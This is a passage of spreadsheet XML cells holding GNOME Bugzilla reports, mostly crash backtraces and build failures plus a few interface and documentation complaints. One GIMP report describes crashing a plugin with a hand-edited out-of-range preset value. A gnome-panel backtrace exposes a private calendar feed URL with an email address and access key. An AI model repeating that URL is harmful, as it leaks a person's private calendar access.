CVS HEAD (2.7/2.8). Compiling the entire Desktop works perfectly as it used for
the past years but when launching it the gnome-settings-daemon crashes (dialog)
reloads crashes (dialog) reloads and so on. It's impossible for me to generate
a backtrace because it locks every other X related process. Even hooking
Bug-Buddy up to catch the backtrace doesn't help. All I was able to gather was
that it jumps to libgnomeui_segv.
Maybe this helps:
- Binutils 2.15
- GCC 3.4.0
- Linux 2.6.6
- XFree 4.4
I already had the thought that this might be XFree 4.4 related since a bunch of
you people switched to X.Org or x.fd.o. Could someone at least confirm whether
this is a known bug or know about a patch (maybe tied to another bugreport) that
helps solving it ?</t>
  </si>
  <si>
    <t>LIBRSVG-309660</t>
  </si>
  <si>
    <t>gcc compiler 4.01 generates errors on pointer targets signedness</t>
  </si>
  <si>
    <t>Version details: cvs head
Distribution/Version: mandrake 10.2
cvs head librsvg compiler gcc 4.01
=========================================
cc1: warnings being treated as errors
rsvg.c: In function 'rsvg_desc_handler_characters':
rsvg.c:306: warning: pointer targets in passing argument 1 of 'g_strndup' differ
in signedness
rsvg.c: In function 'rsvg_title_handler_characters':
rsvg.c:380: warning: pointer targets in passing argument 1 of 'g_strndup' differ
in signedness
rsvg.c: In function 'rsvg_metadata_handler_characters':
rsvg.c:454: warning: pointer targets in passing argument 1 of 'g_strndup' differ
in signedness
rsvg.c: In function 'rsvg_entity_decl':
rsvg.c:650: warning: pointer targets in passing argument 1 of 'strlen' differ in
signedness
rsvg.c:651: warning: pointer targets in passing argument 1 of 'g_strdup' differ
in signedness
rsvg.c:652: warning: pointer targets in assignment differ in signedness
rsvg.c:653: warning: pointer targets in passing argument 1 of 'g_strdup' differ
in signedness
rsvg.c:653: warning: pointer targets in assignment differ in signedness
rsvg.c:654: warning: pointer targets in passing argument 1 of 'g_strdup' differ
in signedness
rsvg.c:654: warning: pointer targets in assignment differ in signedness
rsvg.c:657: warning: pointer targets in passing argument 1 of 'xmlMemStrdup'
differ in signedness
rsvg.c:657: warning: pointer targets in assignment differ in signedness
rsvg.c:658: warning: pointer targets in passing argument 1 of 'strlen' differ in
signedness
rsvg.c: In function 'rsvg_handle_write_impl':
rsvg.c:781: warning: pointer targets in passing argument 2 of 'xmlParseChunk'
differ in signedness
make[2]: *** [rsvg.lo] Error 1
make[1]: *** [all-recursive] Error 1
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>rbutcher</t>
  </si>
  <si>
    <t>GOSSIP-145469</t>
  </si>
  <si>
    <t>No cut&amp;paste in chat windows</t>
  </si>
  <si>
    <t>Copy&amp;paste is available in chat windows but we still can't cut&amp;paste some text
(ctrl+x have no effect).</t>
  </si>
  <si>
    <t>trash</t>
  </si>
  <si>
    <t>LIBGNOME-339463</t>
  </si>
  <si>
    <t>fault in api ref: GNOME_PARAM_OPTION_CONTEXT does not exist</t>
  </si>
  <si>
    <t>Index: doc/reference/tmpl/gnome-program.sgml
===================================================================
RCS file: /cvs/gnome/libgnome/doc/reference/tmpl/gnome-program.sgmlv
retrieving revision 1.12
diff -u -r1.12 gnome-program.sgml
--- doc/reference/tmpl/gnome-program.sgml       28 Feb 2006 00:23:03 -0000      1.12
+++ doc/reference/tmpl/gnome-program.sgml       23 Apr 2006 13:03:56 -0000
@@ -1597 +1597 @@
        g_option_context_add_main_entries (option_context options NULL)
        my_app = gnome_program_init(PACKAGE VERSION LIBGNOMEUI_MODULE
                                    argc argv
-                                   GNOME_PARAM_OPTION_CONTEXT option_context
+                                   GNOME_PARAM_POPT_CONTEXT option_context
                                    GNOME_PARAM_NONE)
        /* Now process any extra args etc ... */
 }</t>
  </si>
  <si>
    <t>de_lupus</t>
  </si>
  <si>
    <t>PAN-62089</t>
  </si>
  <si>
    <t>pan newsreader</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: normal
Version: 0.9.7
Synopsis: pan newsreader
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
i was just reading a cashed message while downloading a new one when the new poped up it gave me a seg fault.
Debugging Information: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ew Thread 1024 (LWP 241)]
[New Thread 2049 (LWP 257)]
[New Thread 1026 (LWP 258)]
[New Thread 5123 (LWP 271)]
0x40743689 in __wait4 () from /lib/libc.so.6
#0  0x40743689 in __wait4 () from /lib/libc.so.6
#1  0x407aca58 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40696247 in waitpid (pid=275 stat_loc=0xbf5ff644 options=0)
    at wrapsyscall.c:173
#3  0x4008f366 in gnome_segv_handle () at eval.c:88
#4  0x40693eb4 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 1 ebp = 3210738196 esp = 3210738144 ebx = 136517992 
      edx = 135211884 ecx = 0 eax = 0 trapno = 14 err = 4 
      eip = 134875385 cs = 35 __csh = 0 eflags = 2163202 
      esp_at_signal = 3210738144 ss = 43 __ssh = 0 fpstate = 0xbf5ff760 
      oldmask = 2147483648 cr2 = 40}) at signals.c:97
#5  
#6  0x80a08f9 in article_is_read () at eval.c:88
#7  0x404011e5 in g_hash_table_foreach () at eval.c:88
#8  0x80a0ba9 in articles_set_read () at eval.c:88
#9  0x8088241 in task_body_new () at eval.c:88
#10 0x80876c9 in task_run () at eval.c:88
#11 0x808071e in queue_get_task_status () at eval.c:88
#12 0x40691065 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:274
#0  0x40743689 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x407aca58 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40696247 in waitpid (pid=275 stat_loc=0xbf5ff644 options=0)
    at wrapsyscall.c:173
stat_loc = (int *) 0xbf5ff644
options = 0
result = 0
oldtype = 0
#3  0x4008f366 in gnome_segv_handle () at eval.c:88
No locals.
#4  0x40693eb4 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 1 ebp = 3210738196 esp = 3210738144 ebx = 136517992 
      edx = 135211884 ecx = 0 eax = 0 trapno = 14 err = 4 
      eip = 134875385 cs = 35 __csh = 0 eflags = 2163202 
      esp_at_signal = 3210738144 ss = 43 __ssh = 0 fpstate = 0xbf5ff760 
      oldmask = 2147483648 cr2 = 40}) at signals.c:97
self = 0xbf5ffc00
in_sighandler = 0x0
#5  
No locals.
#6  0x80a08f9 in article_is_read () at eval.c:88
No locals.
#7  0x404011e5 in g_hash_table_foreach () at eval.c:88
88	in eval.c
No locals.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-10-10 13:42 -------
The original reporter (blunt@darkstar.example.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>blunt</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-324417</t>
  </si>
  <si>
    <t>one version entry is sufficient</t>
  </si>
  <si>
    <t>Please describe the problem:
there should be only one version tag for the bugzilla.gnome.org product.
everything else is confusing.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-124502</t>
  </si>
  <si>
    <t>Less Options is improper English</t>
  </si>
  <si>
    <t>I haven't actually tried the gnome-system-tools yet though it looks like a
very nice suite.  I just took a glance at
http://www.gnome.org/projects/gst/screenshots/users.jpg
and noticed that there is a Less Options button.  Regardless which
dialect of English you prefer American or British this is improper
English.  The opposite of More Options in this context is Fewer Options.
See also http://www.wsu.edu/~brians/errors/amount.html
I look forward to trying these tools soon!  Thanks.</t>
  </si>
  <si>
    <t>GNOME-PANEL-356532</t>
  </si>
  <si>
    <t>notification area</t>
  </si>
  <si>
    <t>crashed while using gwget</t>
  </si>
  <si>
    <t>That bug has been described on https://launchpad.net/distros/ubuntu/+source/gnome-panel/+bug/59991
My panel crashed and I'm not sure what caused it. At the time I was downloading something using gwget and I had just been hit by bug #56452. I'm not sure if either is related.
http://librarian.launchpad.net/4226590/gnome-panel-bugreport.txt
Backtrace
Backtrace was generated from '/usr/bin/gnome-panel'
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1225390416 (LWP 5181)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb75be2e3 in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7eb31b6 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:874
#3  
#4  icon_tip_buffer_compare (a=0x8d3f6b0 b=0xbf966c30) at main.c:292
#5  0xb610546c in message_sent (manager=0x811abb8 icon=0x8c98370 
    text=0x8d26bb0 Download Completed\n(http://www.google.com/calendar/feeds/andrew.conkling@gmail.com/private-5c3f432f0ab8d03026ffbfab1ef064ae/basic) 
    id=3 timeout=100000 trays_screen=0x8d3f6b0) at main.c:369
#6  0xb61071cb in _na_marshal_VOID__OBJECT_STRING_LONG_LONG (
    closure=0x82dfe00 return_value=0x0 n_param_values=5 
    param_values=0xbf966e8c invocation_hint=0xbf966d9c 
    marshal_data=0xb6105410) at na-marshal.c:121
#7  0xb780183b in IA__g_closure_invoke (closure=0x82dfe00 return_value=0x0 
    n_param_values=5 param_values=0xbf966e8c invocation_hint=0xbf966d9c)
    at gclosure.c:490
#8  0xb7811c43 in signal_emit_unlocked_R (node=0x82f4590 detail=0 
    instance=0x811abb8 emission_return=0x0 instance_and_params=0xbf966e8c)
    at gsignal.c:2438
#9  0xb7813167 in IA__g_signal_emit_valist (instance=0x811abb8 
    signal_id=259 detail=0 var_args=0xbf9670dc ÃƒÂ¡ÃƒÂ°\223Ã‚Â·Xr\226Ã‚Â¿ÃƒÂ\212Ãƒâ€œ\b\n)
    at gsignal.c:2197
#10 0xb7813329 in IA__g_signal_emit (instance=0x811abb8 signal_id=259 
    detail=0) at gsignal.c:2241
#11 0xb6105c08 in na_tray_manager_handle_client_message_message_data (
    xev=0xbf967258 event=0x8d38ad0 data=0x811abb8) at na-tray-manager.c:411
#12 0xb7941a63 in gdk_event_translate (display=0x80e60e8 event=0x8d38ad0 
    xevent=0xbf967258 return_exposes=0) at gdkevents-x11.c:2014
#13 0xb794247b in _gdk_events_queue (display=0x80e60e8)
    at gdkevents-x11.c:2254
#14 0xb794287f in gdk_event_dispatch (source=0x80ec998 callback=0 
    user_data=0x0) at gdkevents-x11.c:2314
#15 0xb76b9872 in IA__g_main_context_dispatch (context=0x80ec9e0)
    at gmain.c:2045
#16 0xb76bc84f in g_main_context_iterate (context=0x80ec9e0 block=1 
    dispatch=1 self=0x80c8ad8) at gmain.c:2677
#17 0xb76bcbf9 in IA__g_main_loop_run (loop=0x82468f0) at gmain.c:2881
#18 0xb7aba464 in IA__gtk_main () at gtkmain.c:1024
#19 0x08061d8c in main (argc=5 argv=0xbf967524) at main.c:95
...</t>
  </si>
  <si>
    <t>GIMP-148088</t>
  </si>
  <si>
    <t>Gimpressionist Crashes if Given Malicious Presets with Out of Range Values</t>
  </si>
  <si>
    <t>Gimpressioinst crashes if given malicious presets with out of range values 
in the radio buttons group numeric values: placetype orienttype etc. 
To reproduce do the following: 
1. Save a preset as BREAKING. 
2. Manually edit the file in ~/.gimp-2.1/gimpressionist/Presets/BREAKING and 
set the placetype line to: 
placetype=1000000 
3. Load this preset from gimpressionist.</t>
  </si>
  <si>
    <t>NAUTILUS-41733</t>
  </si>
  <si>
    <t>[obsolete] Views: Web Page</t>
  </si>
  <si>
    <t>The mozilla component should be able to return custom uris.</t>
  </si>
  <si>
    <t xml:space="preserve">In order for a good portion of the sevice flow to work Mozilla needs a way to
return control back to nautilus via custom uris. An example would be
eazel:install?nautilus or eazel-install:nautilus.  There is currently a hack in
the demo branch to do this but we need to figure out the long term solution
soon.
------- Additional Comments From ramiro@fateware.com 2000-07-25 17:15:50 ----
one day assigned
------- Additional Comments From ramiro@fateware.com 2000-09-05 03:58:57 ----
This task was painful.  More than I thought it would be.  I ended up having to
do 2 implementations one for mozilla M17 and one for M18.  The M18
implementation is the preffered way which we cant use until mozilla M18 is
released.
Marking 3 days fixed.
------- Additional Comments From eli@eazel.com 2000-10-16 19:32:19 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
The original reporter (pepper@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ramiro</t>
  </si>
  <si>
    <t>pepper</t>
  </si>
  <si>
    <t>TRACKER-417828</t>
  </si>
  <si>
    <t>tracker-preferences bloats .tracker.cfg</t>
  </si>
  <si>
    <t>Each time t-p is run it add an additional new line between the different sections (like General and Watches). This bloats tracker.cfg unnecesarily</t>
  </si>
  <si>
    <t>GLIB-356769</t>
  </si>
  <si>
    <t>Configure fails to properly set PERL_PATH if $PERL is set in the environment</t>
  </si>
  <si>
    <t>Configure fails to properly set PERL_PATH if $PERL is set in the environment. If $PERL is *not* set in the environment all is well.
from config.log:
   checking for perl5... /usr/bin/perl
   checking for indent... indent
   checking for /usr/bin/perl... no
from top level Makefile:
   PERL = /usr/bin/perl
   PERL_PATH = 
PERL_PATH is used with ./gobject/glib-mkenums.in 
   #!@PERL_PATH@ -w
to produce  glib-mkenums
When $PERL is set in the environment
   PERL_PATH=''  
which sets the top line of glib-mkenums to
   #! -w
-Joseph</t>
  </si>
  <si>
    <t>DASHER-479521</t>
  </si>
  <si>
    <t>DASHER</t>
  </si>
  <si>
    <t>Crashes during alphabet training</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Click on the 'Alphabet' dropdown list
2. Select an alphabet
3. The 'Training Dasher' box pops up
4. When the progress bar reaches 100% Dasher crashes with the following message:
(dasher:5978): Gtk-CRITICAL **: gtk_list_store_get_value: assertion `VALID_ITER (iter list_store)' failed
(dasher:5978): GLib-GObject-WARNING **: /build/buildd/glib2.0-2.14.1/gobject/gtype.c:3339: type id `0' is invalid
(dasher:5978): GLib-GObject-WARNING **: can't peek value table for type `' which is not currently referenced
Stack trace:
(No debug libs installed so not providing a stack trace.)
Other information:</t>
  </si>
  <si>
    <t>rfrancoise</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-484351</t>
  </si>
  <si>
    <t>[obsolete] Assistive Technology Preferences</t>
  </si>
  <si>
    <t>Don't use Preferences word in launcher name</t>
  </si>
  <si>
    <t>As well as applications should not use Application word in their visible name (as per HIG) I think capplets should not use the word Preferences.
It seems that at-properties is the only capplet from gnome-control-center adding Preferences to Name key in .desktop file.
I strogly suggest to remove it.</t>
  </si>
  <si>
    <t>lferrett</t>
  </si>
  <si>
    <t>GNOME-APPLETS-74316</t>
  </si>
  <si>
    <t>charpick</t>
  </si>
  <si>
    <t>accessibility required for charpick applet</t>
  </si>
  <si>
    <t>this applet requires accessibility and tooltip.</t>
  </si>
  <si>
    <t>deepa.natarajan</t>
  </si>
  <si>
    <t>GDM-106178</t>
  </si>
  <si>
    <t>Yiddish entry needed in GDM language table</t>
  </si>
  <si>
    <t>There are now some translations for Yiddish in GNOME (language code
yi). It should probably have a corresponding language entry in the gdm
greeter.
raphael@cs.uky.edu could you attach the language name Yiddish
translated into Yiddish (as a UTF-8-encoded attachment to this report).
That information is probably needed.</t>
  </si>
  <si>
    <t>EVOLUTION-348565</t>
  </si>
  <si>
    <t>Crashed switching from Classical View to Vertical View in Email</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Evolution crashed switching from classical view to vertical view in Email component (and vice versa every time).
Distribution: Ubuntu 6.06 (dapper)
Gnome Release: 2.15.4 2006-07-20 (JHBuild)
BugBuddy Version: 2.15.90
Memory status: size: 80310272 vsize: 0 resident: 80310272 share: 0 rss: 28463104 rss_rlim: 0
CPU usage: start_time: 1153769849 rtime: 0 utime: 552 stime: 0 cutime:510 cstime: 0 timeout: 42 it_real_value: 0 frequency: 0
Backtrace was generated from '/opt/gnome2/bin/evolution-2.8'
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1233303872 (LWP 11211)]
[New Thread -1279198288 (LWP 11268)]
[New Thread -1295983696 (LWP 11267)]
[New Thread -1304376400 (LWP 11265)]
[New Thread -1253753936 (LWP 11221)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb72c248b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7893b04 in libgnomeui_segv_handle (signum=-512) at gnome-ui-init.c:867
#3  
#4  0xffffe410 in __kernel_vsyscall ()
#5  0xb68649a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#6  0xb68662b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#7  0xb69b3b76 in g_logv (log_domain= 
    log_level=G_LOG_LEVEL_CRITICAL 
    format=0xb69dc095 %s: assertion `%s' failed 
    args1=0xbf954ccc \001H Â·\226Ã‘\037Â·0\vÃµÂ·Â¸ÃŒ\n\b\003\001\006)
    at gmessages.c:497
#8  0xb69b3bb6 in g_log (log_domain=0x0 log_level=0 format=0x0)
    at gmessages.c:517
#9  0xb69b3c8a in g_return_if_fail_warning (log_domain=0x0 
    pretty_function=0xb7204801 gtk_widget_set_size_request expression=0x0)
    at gmessages.c:532
#10 0xb7124cfe in gtk_widget_set_size_request (widget=0x8766160 width=-15 
    height=0) at gtkwidget.c:6073
#11 0xb7ef6d9a in e_attachment_bar_set_width (bar=0x8766160 bar_width=-15)
    at e-attachment-bar.c:520
#12 0xb5d5f2cb in efhd_bar_resize (w=0x8461eb0 event=0xbf95527c 
    efh=0x8461230) at em-format-html-display.c:2219
#13 0xb6a2c3d2 in g_cclosure_marshal_VOID__BOXED (closure=0x87eb7e0 
    return_value=0x0 n_param_values=2 param_values=0xbf95500c 
    invocation_hint=0xbf954efc marshal_data=0xb5d5f26d) at gmarshal.c:566
#14 0xb6a1fda9 in g_closure_invoke (closure=0x87eb7e0 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#15 0xb6a2ea3a in signal_emit_unlocked_R (node=0x8154560 detail=0 
    instance=0x8461eb0 emission_return=0x0 instance_and_params=0xbf95500c)
    at gsignal.c:2438
#16 0xb6a30269 in g_signal_emit_valist (instance=0x8461eb0 signal_id=44 
    detail=0 var_args=) at gsignal.c:2197
#17 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#18 0xb7121760 in gtk_widget_size_allocate (widget=0x8461eb0 
    allocation=0xbf9552ac) at gtkwidget.c:3049
#19 0xb78ef527 in child_size_allocate (o=0x87e50a0 e=0x862c090 data=0x0)
    at gtkhtml.c:1174
#20 0xb7931394 in forall (self=0x0 e=0x0 
    func=0xb78ef4c6  data=0x0) at htmlobject.c:523
#21 0xb79322a1 in html_object_forall (self=0x6 e=0x0 func=0 data=0x0)
    at htmlobject.c:1307
#22 0xb78ffdd3 in forall (self=0x85a0740 e=0x862c090 
    func=0xb78ef4c6  data=0x0) at htmlclue.c:458
#23 0xb79322a1 in html_object_forall (self=0x6 e=0x0 func=0 data=0x0)
    at htmlobject.c:1307
#24 0xb78ffdd3 in forall (self=0x8760d60 e=0x862c090 
    func=0xb78ef4c6  data=0x0) at htmlclue.c:458
#25 0xb79322a1 in html_object_forall (self=0x6 e=0x0 func=0 data=0x0)
    at htmlobject.c:1307
#26 0xb78f4d75 in size_allocate (widget=0x8456aa0 allocation=0xbf95596c)
    at gtkhtml.c:1228
#27 0xb6a2c3d2 in g_cclosure_marshal_VOID__BOXED (closure=0x817d368 
    return_value=0x0 n_param_values=2 param_values=0xbf9556fc 
    invocation_hint=0xbf9555ec marshal_data=0xb78f4b3c) at gmarshal.c:566
#28 0xb6a1f76b in g_type_class_meta_marshal (closure=0x817d368 
    return_value=0x0 n_param_values=0 param_values=0xbf9556fc 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#29 0xb6a1fda9 in g_closure_invoke (closure=0x817d368 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#30 0xb6a2ed1c in signal_emit_unlocked_R (node=0x8154560 detail=0 
    instance=0x8456aa0 emission_return=0x0 instance_and_params=0xbf9556fc)
    at gsignal.c:2368
#31 0xb6a30269 in g_signal_emit_valist (instance=0x8456aa0 signal_id=44 
    detail=0 var_args=) at gsignal.c:2197
#32 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#33 0xb7121760 in gtk_widget_size_allocate (widget=0x8456aa0 
    allocation=0xbf9559c4) at gtkwidget.c:3049
#34 0xb706e8a4 in gtk_scrolled_window_size_allocate (widget=0x864b988 
    allocation=0xbf955f2c) at gtkscrolledwindow.c:1327
#35 0xb6a2c3d2 in g_cclosure_marshal_VOID__BOXED (closure=0x817d368 
    return_value=0x0 n_param_values=2 param_values=0xbf955cbc 
    invocation_hint=0xbf955bac marshal_data=0xb706e74d) at gmarshal.c:566
#36 0xb6a1f76b in g_type_class_meta_marshal (closure=0x817d368 
    return_value=0x0 n_param_values=0 param_values=0xbf955cbc 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#37 0xb6a1fda9 in g_closure_invoke (closure=0x817d368 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#38 0xb6a2ed1c in signal_emit_unlocked_R (node=0x8154560 detail=0 
    instance=0x864b988 emission_return=0x0 instance_and_params=0xbf955cbc)
    at gsignal.c:2368
#39 0xb6a30269 in g_signal_emit_valist (instance=0x864b988 signal_id=44 
    detail=0 var_args=) at gsignal.c:2197
#40 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#41 0xb7121760 in gtk_widget_size_allocate (widget=0x864b988 
    allocation=0xbf955f88) at gtkwidget.c:3049
#42 0xb711cee4 in gtk_vpaned_size_allocate (widget=0x8461050 
    allocation=0xbf9564fc) at gtkvpaned.c:178
#43 0xb6a2c3d2 in g_cclosure_marshal_VOID__BOXED (closure=0x817d368 
    return_value=0x0 n_param_values=2 param_values=0xbf95628c 
    invocation_hint=0xbf95617c marshal_data=0xb711cc92) at gmarshal.c:566
#44 0xb6a1f76b in g_type_class_meta_marshal (closure=0x817d368 
    return_value=0x0 n_param_values=0 param_values=0xbf95628c 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#45 0xb6a1fda9 in g_closure_invoke (closure=0x817d368 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#46 0xb6a2ed1c in signal_emit_unlocked_R (node=0x8154560 detail=0 
    instance=0x8461050 emission_return=0x0 instance_and_params=0xbf95628c)
    at gsignal.c:2368
#47 0xb6a30269 in g_signal_emit_valist (instance=0x8461050 signal_id=44 
    detail=0 var_args=) at gsignal.c:2197
#48 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#49 0xb7121760 in gtk_widget_size_allocate (widget=0x8461050 
    allocation=0x8461074) at gtkwidget.c:3049
#50 0xb6f8da63 in gtk_container_resize_children (container=0x8461050)
    at gtkcontainer.c:1232
#51 0xb5d48667 in em_folder_browser_show_wide (emfb=0x8609000 state=0)
    at em-folder-browser.c:627
#52 0xb5d495ae in emfb_show_next (uic=0x85ece30 path=0x8836350 ViewAfter 
    type=Bonobo_UIComponent_STATE_CHANGED state=0x8836360 0 data=0x0)
    at em-folder-browser.c:1538
#53 0xb77bfa86 in bonobo_ui_marshal_VOID__STRING_INT_STRING (
    closure=0x848e6a8 return_value=0xbf9567a4 n_param_values=4 
    param_values=0x88362c8 invocation_hint=0x0 marshal_data=0xb5d4954f)
    at bonobo-ui-marshal.c:82
#54 0xb6a1fda9 in g_closure_invoke (closure=0x848e6a8 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#55 0xb764b45a in bonobo_closure_invoke_va_list (closure=0x848e6a8 
    return_value=0x0 var_args=0x0) at bonobo-types.c:404
#56 0xb764b757 in bonobo_closure_invoke (closure=0x848e6a8 return_type=4)
    at bonobo-types.c:467
#57 0xb77a1f82 in ui_event (component=0x85ece30 id=0x88363a8 ViewAfter 
    type=6 state=0x6 ) at bonobo-ui-component.c:97
#58 0xb77bfa86 in bonobo_ui_marshal_VOID__STRING_INT_STRING (
    closure=0x818d3a8 return_value=0x0 n_param_values=4 
    param_values=0xbf956acc invocation_hint=0xbf9569bc 
    marshal_data=0xb77a1ef8) at bonobo-ui-marshal.c:82
#59 0xb6a1f76b in g_type_class_meta_marshal (closure=0x818d3a8 
    return_value=0x0 n_param_values=0 param_values=0xbf956acc 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#60 0xb6a1fda9 in g_closure_invoke (closure=0x818d3a8 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#61 0xb6a2ed1c in signal_emit_unlocked_R (node=0x82ee178 detail=0 
    instance=0x85ece30 emission_return=0x0 instance_and_params=0xbf956acc)
    at gsignal.c:2368
#62 0xb6a30269 in g_signal_emit_valist (instance=0x85ece30 signal_id=175 
    detail=0 var_args=) at gsignal.c:2197
#63 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#64 0xb77a1edc in impl_Bonobo_UIComponent_uiEvent (servant=0x85ece44 id=0x0 
    type=Bonobo_UIComponent_STATE_CHANGED state=0x0 ev=0xbf956e38)
    at bonobo-ui-component.c:186
#65 0xb764c4c4 in _ORBIT_skel_small_Bonobo_UIComponent_uiEvent (
    _o_servant=0x0 _o_retval=0x0 _o_args=0x6 _o_ctx=0x0 _o_ev=0x0 
    _impl_uiEvent=0xb77a1e65 )
    at Bonobo-common.c:336
#66 0xb7306455 in ORBit_c_stub_invoke (obj=0x84ae498 methods=0xb766f844 
    method_index=5 ret=0x0 args=0xbf956dc8 ctx=0x0 ev=0xbf956e38 
    class_id=14 method_offset=24 
    skel_impl=0xb764c491 )
    at poa.c:2630
#67 0xb7650174 in Bonobo_UIComponent_uiEvent (_obj=0x0 
    id=0x8836cc8 ViewAfter type=Bonobo_UIComponent_STATE_CHANGED 
    state=0x88378f8 0 ev=0x0) at Bonobo-stubs.c:553
#68 0xb77a9693 in impl_emit_event_on (engine=0x81fcb40 node=0x848acc0 
    state=0x88377f0 0) at bonobo-ui-engine.c:1782
#69 0xb77bfc80 in bonobo_ui_marshal_VOID__POINTER_STRING (closure=0x81130e8 
    return_value=0x0 n_param_values=3 param_values=0xbf95711c 
    invocation_hint=0xbf95700c marshal_data=0xb77a933d)
    at bonobo-ui-marshal.c:196
#70 0xb6a1f76b in g_type_class_meta_marshal (closure=0x81130e8 
    return_value=0x0 n_param_values=0 param_values=0xbf95711c 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#71 0xb6a1fda9 in g_closure_invoke (closure=0x81130e8 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#72 0xb6a2f11e in signal_emit_unlocked_R (node=0x8113650 detail=0 
    instance=0x81fcb40 emission_return=0x0 instance_and_params=0xbf95711c)
    at gsignal.c:2476
#73 0xb6a30269 in g_signal_emit_valist (instance=0x81fcb40 signal_id=152 
    detail=0 var_args=) at gsignal.c:2197
#74 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#75 0xb77a71df in bonobo_ui_engine_emit_event_on_w (engine=0x0 widget=0x0 
    state=0x6 ) at bonobo-ui-engine.c:3060
#76 0xb77ad625 in menu_toggle_emit_ui_event (item=0x84aae80 engine=0x0)
    at bonobo-ui-sync-menu.c:461
#77 0xb6a2bb70 in g_cclosure_marshal_VOID__VOID (closure=0x849ba60 
    return_value=0x0 n_param_values=1 param_values=0xbf95761c 
    invocation_hint=0xbf95750c marshal_data=0xb77ad5de) at gmarshal.c:77
#78 0xb6a1fda9 in g_closure_invoke (closure=0x849ba60 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#79 0xb6a2ea3a in signal_emit_unlocked_R (node=0x8197e90 detail=0 
    instance=0x84aae80 emission_return=0x0 instance_and_params=0xbf95761c)
    at gsignal.c:2438
#80 0xb6a30269 in g_signal_emit_valist (instance=0x84aae80 signal_id=184 
    detail=0 var_args=) at gsignal.c:2197
#81 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#82 0xb6f69d72 in gtk_check_menu_item_toggled (check_menu_item=0x0)
    at gtkcheckmenuitem.c:249
#83 0xb7050592 in gtk_radio_menu_item_activate (menu_item=0x84aae80)
    at gtkradiomenuitem.c:479
#84 0xb6a2bb70 in g_cclosure_marshal_VOID__VOID (closure=0x8193070 
    return_value=0x0 n_param_values=1 param_values=0xbf957b3c 
    invocation_hint=0xbf957a2c marshal_data=0xb70504f3) at gmarshal.c:77
#85 0xb6a1f76b in g_type_class_meta_marshal (closure=0x8193070 
    return_value=0x0 n_param_values=0 param_values=0xbf957b3c 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#86 0xb6a1fda9 in g_closure_invoke (closure=0x8193070 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#87 0xb6a2ed1c in signal_emit_unlocked_R (node=0x8193088 detail=0 
    instance=0x84aae80 emission_return=0x0 instance_and_params=0xbf957b3c)
    at gsignal.c:2368
#88 0xb6a30269 in g_signal_emit_valist (instance=0x84aae80 signal_id=179 
